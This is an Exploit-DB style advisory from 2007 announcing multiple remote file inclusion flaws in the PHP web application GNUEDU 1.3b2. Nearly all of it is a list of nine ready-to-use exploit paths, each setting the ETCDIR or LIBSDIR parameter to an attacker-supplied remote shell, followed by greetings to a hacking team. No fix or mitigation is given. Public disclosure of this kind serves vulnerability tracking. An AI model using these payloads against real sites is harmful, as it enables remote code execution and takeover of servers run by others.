GNUEDU 1.3b2 - Multiple Remote File Inclusions

EDB-ID:

3876


Author:

GoLd_M

Type:

webapps


Platform:

PHP

Date:

2007-05-08


# gnuedu 1.3b2 Multiple Remote File Inclusion Vulnerabilities
# D.Script: http://gnuedu.ofset.org/download/
# Discovered by: GolD_M = [Mahmood_ali]
# Homepage: http://www.Tryag.Com/cc
# Exploit:[Path]/libs/lom.php?ETCDIR=Shell
# Exploit:[Path]/scripts/lom_update.php?ETCDIR=Shell
# Exploit:[Path]/scripts/check-lom.php?ETCDIR=Shell
# Exploit:[Path]/scripts/weigh_keywords.php?ETCDIR=Shell
# Exploit:[Path]/web/logout.php?LIBSDIR=Shell
# Exploit:[Path]/web/help.php?LIBSDIR=Shell
# Exploit:[Path]/web/index.php?LIBSDIR=Shell
# Exploit:[Path]/web/login.php?LIBSDIR=Shell
# Exploit:[Path]/web/lom.php?ETCDIR=Shell
# Greetz To: Tryag-Team ....**

# milw0rm.com [2007-05-08]